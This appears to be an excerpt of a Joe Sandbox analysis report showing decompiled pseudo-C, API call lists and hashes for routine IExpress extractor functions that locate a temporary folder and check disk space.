                                                                                                                                                                                                      control_flow_graph 232 e55a0-e55d9 call e468f LocalAlloc 235 e55fd-e560c call e468f 232->235 236 e55db-e55f1 call e44b9 call e6285 232->236 241 e560e-e5630 call e44b9 LocalFree 235->241 242 e5632-e5643 lstrcmpA 235->242 248 e55f6-e55f8 236->248 241->248 245 e564b-e5659 LocalFree 242->245 246 e5645 242->246 250 e565b-e565d 245->250 251 e5696-e569c 245->251 246->245 252 e58b7-e58c7 call e6ce0 248->252 255 e565f-e5667 250->255 256 e5669 250->256 253 e589f-e58b5 call e6517 251->253 254 e56a2-e56a8 251->254 253->252 254->253 259 e56ae-e56c1 GetTempPathA 254->259 255->256 260 e566b-e567a call e5467 255->260 256->260 263 e56f3-e5711 call e1781 259->263 264 e56c3-e56c9 call e5467 259->264 269 e589b-e589d 260->269 270 e5680-e5691 call e44b9 260->270 274 e586c-e5890 GetWindowsDirectoryA call e597d 263->274 275 e5717-e5729 GetDriveTypeA 263->275 272 e56ce-e56d0 264->272 269->252 270->248 272->269 276 e56d6-e56df call e2630 272->276 274->263 288 e5896 274->288 278 e572b-e572e 275->278 279 e5730-e5740 GetFileAttributesA 275->279 276->263 289 e56e1-e56ed call e5467 276->289 278->279 282 e5742-e5745 278->282 279->282 283 e577e-e578f call e597d 279->283 286 e576b 282->286 287 e5747-e574f 282->287 295 e57b2-e57bf call e2630 283->295 296 e5791-e579e call e2630 283->296 292 e5771-e5779 286->292 287->292 293 e5751-e5753 287->293 288->269 289->263 289->269 298 e5864-e5866 292->298 293->292 297 e5755-e5762 call e6952 293->297 307 e57d3-e57f8 call e658a GetFileAttributesA 295->307 308 e57c1-e57cd GetWindowsDirectoryA 295->308 296->286 306 e57a0-e57b0 call e597d 296->306 297->286 309 e5764-e5769 297->309 298->274 298->275 306->286 306->295 314 e580a 307->314 315 e57fa-e5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 e580d-e580f 314->316 315->316 317 e5827-e585c SetFileAttributesA 
call e1781 call e5467 316->317 318 e5811-e5825 316->318 317->269 323 e585e 317->323 318->298 323->298
C-Code - Quality: 92%
			E000E55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xe8004; // 0xb7c20988
				_v8 = _t28 ^ _t110;
				_t2 = E000E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E000E468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xe9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xe8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xe8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E000E6517(_t82, 0x7d2, 0, E000E3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xe9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xe91e4;
									_t40 = GetTempPathA(0x104, 0xe91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E000E1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E000E6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E000E597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E000E2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E000E658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xe91e4;
																					E000E1781(0xe91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E000E5467(0xe91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E000E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E000E597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E000E5467(0xe91e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0xe91e4;
                                                                                                                                                                                                      											_t70 = E000E2630(0, 0xe91e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0xe91e4;
                                                                                                                                                                                                      												_t71 = E000E5467(0xe91e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E000E597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe8b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E000E5467(0xe8b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E000E44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E000E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x000e570a
                                                                                                                                                                                                      0x000e5711
                                                                                                                                                                                                      0x000e5717
                                                                                                                                                                                                      0x000e5724
                                                                                                                                                                                                      0x000e5726
                                                                                                                                                                                                      0x000e5729
                                                                                                                                                                                                      0x000e5730
                                                                                                                                                                                                      0x000e5737
                                                                                                                                                                                                      0x000e573d
                                                                                                                                                                                                      0x000e5740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e572b
                                                                                                                                                                                                      0x000e572b
                                                                                                                                                                                                      0x000e572e
                                                                                                                                                                                                      0x000e5742
                                                                                                                                                                                                      0x000e5742
                                                                                                                                                                                                      0x000e5745
                                                                                                                                                                                                      0x000e576b
                                                                                                                                                                                                      0x000e576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5747
                                                                                                                                                                                                      0x000e5747
                                                                                                                                                                                                      0x000e574d
                                                                                                                                                                                                      0x000e574f
                                                                                                                                                                                                      0x000e5771
                                                                                                                                                                                                      0x000e5771
                                                                                                                                                                                                      0x000e5773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5751
                                                                                                                                                                                                      0x000e5751
                                                                                                                                                                                                      0x000e5753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5755
                                                                                                                                                                                                      0x000e575b
                                                                                                                                                                                                      0x000e5760
                                                                                                                                                                                                      0x000e5762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5764
                                                                                                                                                                                                      0x000e5764
                                                                                                                                                                                                      0x000e5769
                                                                                                                                                                                                      0x000e577e
                                                                                                                                                                                                      0x000e577e
                                                                                                                                                                                                      0x000e5781
                                                                                                                                                                                                      0x000e5788
                                                                                                                                                                                                      0x000e578d
                                                                                                                                                                                                      0x000e578f
                                                                                                                                                                                                      0x000e57b2
                                                                                                                                                                                                      0x000e57b8
                                                                                                                                                                                                      0x000e57bd
                                                                                                                                                                                                      0x000e57bf
                                                                                                                                                                                                      0x000e57cd
                                                                                                                                                                                                      0x000e57cd
                                                                                                                                                                                                      0x000e57dd
                                                                                                                                                                                                      0x000e57e3
                                                                                                                                                                                                      0x000e57ef
                                                                                                                                                                                                      0x000e57f5
                                                                                                                                                                                                      0x000e57f8
                                                                                                                                                                                                      0x000e580a
                                                                                                                                                                                                      0x000e580a
                                                                                                                                                                                                      0x000e57fa
                                                                                                                                                                                                      0x000e5802
                                                                                                                                                                                                      0x000e5802
                                                                                                                                                                                                      0x000e580d
                                                                                                                                                                                                      0x000e580f
                                                                                                                                                                                                      0x000e5830
                                                                                                                                                                                                      0x000e5836
                                                                                                                                                                                                      0x000e583d
                                                                                                                                                                                                      0x000e584b
                                                                                                                                                                                                      0x000e5851
                                                                                                                                                                                                      0x000e5855
                                                                                                                                                                                                      0x000e585a
                                                                                                                                                                                                      0x000e585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x000e5811
                                                                                                                                                                                                      0x000e5817
                                                                                                                                                                                                      0x000e5819
                                                                                                                                                                                                      0x000e581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e581f
                                                                                                                                                                                                      0x000e5791
                                                                                                                                                                                                      0x000e5797
                                                                                                                                                                                                      0x000e579c
                                                                                                                                                                                                      0x000e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e57a0
                                                                                                                                                                                                      0x000e57a9
                                                                                                                                                                                                      0x000e57ae
                                                                                                                                                                                                      0x000e57b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e57b0
                                                                                                                                                                                                      0x000e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5769
                                                                                                                                                                                                      0x000e5762
                                                                                                                                                                                                      0x000e5753
                                                                                                                                                                                                      0x000e574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56c3
                                                                                                                                                                                                      0x000e56c5
                                                                                                                                                                                                      0x000e56c9
                                                                                                                                                                                                      0x000e56ce
                                                                                                                                                                                                      0x000e56d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56d6
                                                                                                                                                                                                      0x000e56d6
                                                                                                                                                                                                      0x000e56d8
                                                                                                                                                                                                      0x000e56dd
                                                                                                                                                                                                      0x000e56df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56e1
                                                                                                                                                                                                      0x000e56e2
                                                                                                                                                                                                      0x000e56e4
                                                                                                                                                                                                      0x000e56e6

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000E55CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 000E5638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000E5620
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E56B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 000E571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 000E5737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000E57CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000E57EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 000E5802
                                                                                                                                                                                                        • Part of subcall function 000E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 000E2654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 000E5830
                                                                                                                                                                                                        • Part of subcall function 000E6517: FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                        • Part of subcall function 000E6517: LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                        • Part of subcall function 000E6517: DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                        • Part of subcall function 000E6517: FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 000E5878
                                                                                                                                                                                                        • Part of subcall function 000E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000E59A8
                                                                                                                                                                                                        • Part of subcall function 000E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000E59AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-429805196
                                                                                                                                                                                                      • Opcode ID: ef0d9e4df9dc0f0d8ba89aa9e226ea3facfcc48602d3627dec2f0732cfd92aec
                                                                                                                                                                                                      • Instruction ID: 74f643f0dfbef0e76acd92515bb69fd3c197b861d3d3be8be18aab4929db84e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef0d9e4df9dc0f0d8ba89aa9e226ea3facfcc48602d3627dec2f0732cfd92aec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20814B70B04AC45EEB609B339D85BFE72AD9B65709F0008A5F5C6F7192DFB48EC18A10
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E000E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xe8004; // 0xb7c20988
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xe9124 = E000E6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xe9a34 & 0x00000008;
							if(( *0xe9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xe9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xe9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E000E268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xe9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xe9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000E44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xe9124 = E000E6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000E44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xe9124 = E000E6285();
					_t66 = 0;
					L33:
					return E000E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}




































                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000E59A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 000E59AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 000E5A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 000E5A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000E5A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E5A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000E5A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 000E5AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 000E5BFC
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
